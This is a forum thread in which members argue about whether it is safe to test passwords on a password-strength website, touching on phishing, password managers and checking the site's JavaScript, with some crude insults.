How Secure Is My Password - Interesting Website

[PhilipDT]

This is ridiculous, if you want to make sure your password is secure you don't need to ENTER IT on a random website posted on a forum. Just take the time to read about password security, don't break the first rule about online security: DO NOT enter your passwords on a website just because it asks you to!!

The site gives you 'cool' useless information, the calculations are based on current processing power and longer password cracking times do not necessarily mean better passwords.

Hey, how about this, if you want to know FOR SURE if your boobs look good just come to my place and show them to me! no good?

Check out the page source (whirligig U on firefox on mac), it runs this JS:

http://howsecureismypassword.net/hsimp.js

Copy and paste that into something that gets it onto one page (like word) and if you're familiar with reading code you'll see that there is no communication back to the server.

The security is in the utter simplicity of the website.

 

[zork]

Check out the page source (whirligig U on firefox on mac), it runs this JS:

http://howsecureismypassword.net/hsimp.js

Copy and paste that into something that gets it onto one page (like word) and if you're familiar with reading code you'll see that there is no communication back to the server.

The security is in the utter simplicity of the website.

Yes I know that I didn't say this website is stealing passwords, I'm saying that it could, but still, the do-not-give-away-your-passwords rule remains.

People don't check the source code of a website and even if they did, you have to know what you are doing or looking for.

Imagine the website Lee posted was in fact malicious, he posted it here and everyone went and entered their password, that's what I am advising against, being an internet slut.

 

[scotttswan]

why remember multiple passwords when you can use 1password (not free) or keepassx (free) combined with dropbox to keep a backup of your password file and get access to it from anywhere in the world.

If some site gets hacked. (hackers discover a fatal security flaw in vBulletin® Version 3.7.3 used here for example.) If they eventually manage to crack the encryption of the passwords. They'll get a random string that will log them into 1 website.

 

[PhilipDT]

I use mSecure personally.

 

[zork]

Well, the thing is that I design websites so I would never post a site that would pose danger to the security of members of this site!

I simply wanted to share some information with users who might not be aware that passwords really need to be "strong" to avoid potential danger of hacking and save (hopefully) someone a headache down the road with that information.


Here is a link to an article on hacking and passwords (no - you don't have to put your password in - just read it).
LINK

I feel like I'm taking crazy pills here, people on this thread are actually supporting such a bad idea as just typing in passwords anywhere on the internet for the sake of learning?? Not too bright really!

I know about security, I get paid to make big servers secure and I'm not talking about keeping grandma's emails and pictures safe. What I am saying here is that no matter how cool the link is and how much you want to help people, you cannot advise end users to type in their passwords on a random webpage just so 'they learn' how their passwords need to be strong.

What you are doing here, falls under the definition of phishing, you are asking a group of users you are familiar with and possibly shared email addresses with and other information as well, to type in their passwords on a non secure web page, AND you are a web designer.

That is exactly how phishing works and how countless people around the world are fucked online.

Now I know (well, I don't know, really) you are not a phisher and you were just trying to do good, but what you are doing and advising here is completely the opposite of what you are trying to help prevent.

 

[citygirl]

But there is no way to link the password to a specific account unless I am missing something.

Even if they figure out it's my IP address and capture the password I entered in - how would they a) know my user name for a specific site and b) know which account is for which password? I have a different login/password for every single account. So they would have to know that a) it's me b) figure out my user name and then c) figure out what password goes with that specific account.

 

[zork]

But there is no way to link the password to a specific account unless I am missing something.

Even if they figure out it's my IP address and capture the password I entered in - how would they a) know my user name for a specific site and b) know which account is for which password? I have a different login/password for every single account. So they would have to know that a) it's me b) figure out my user name and then c) figure out what password goes with that specific account.

It's so annoying when the guy who tells everyone they should give away their passwords to some website he posted doesn't have to explain anything at all and the guy trying to teach people that this procedure is just plain dumb (entering your passwords anywhere on command) has to actually explain everything.

But still, cookies on your browser cache will tell me everything about your internet life, where you log on to, when, what different email addresses you use for each, etc, and if I'm a website I have access to these simple .txt file formatted cookies that are stored.. in your browser's cache.

Also, yeah you have a password for each service, but MOST people use the same (weak) password for every single site/service they use, the same password for gmail, baexpats, paypal, anything. I've worked with these technologies for years and I've seen people I know even, stealing passwords like crazy, lots of them not just targetted at one. And even if you use different passwords for everything, it takes less than 10 minutes to just try and discard the possible passwords that YOU provided until you they it right.

 

[sesamosinsal]

It's so annoying when the guy who tells everyone they should give away their passwords to some website he posted doesn't have to explain anything at all and the guy trying to teach people that this procedure is just plain dumb (entering your passwords anywhere on command) has to actually explain everything.

But still, cookies on your browser cache will tell me everything about your internet life, where you log on to, when, what different email addresses you use for each, etc, and if I'm a website I have access to these simple .txt file formatted cookies that are stored.. in your browser's cache.

Also, yeah you have a password for each service, but MOST people use the same (weak) password for every single site/service they use, the same password for gmail, baexpats, paypal, anything. I've worked with these technologies for years and I've seen people I know even, stealing passwords like crazy, lots of them not just targetted at one. And even if you use different passwords for everything, it takes less than 10 minutes to just try and discard the possible passwords that YOU provided until you they it right.

Good heavens. Do you know anything about code? The password is being stored NO WHERE. If you're so paranoid and want to use the website to see how secure your password is, all you have to do is load the browser in an incognito version of Chrome, disconnect your internet connection, and voila: The page will still work, and the transmission of the password would be impossible because there would be no internet connection.

Oh yeah, I almost forgot.. Before turning off your internet connection to use the website, make sure you firmly place a tinfoil hat on your head.

 

[zork]

Do you need me to define phishing, or do you want to continue scare mongering?

I see you are unable to explain why you said I can't read code and I think the website lee posted is logging passwords, can you show me where I said that please? Otherwise you are not funny, you are just a pr-ick, help me laugh with you.

You are also unable to find the similarities between phishing and what lee did here and also you seem to have a hard time considering the examples I wrote here, one of them being phishing. Again, you keep putting words in my mouth, if you can't back it up, what can I do? You are treating me as if I came here and said 'be careful lee posted a phishing site and the code is stealing everyone's passwords!!', now back it up or stfu.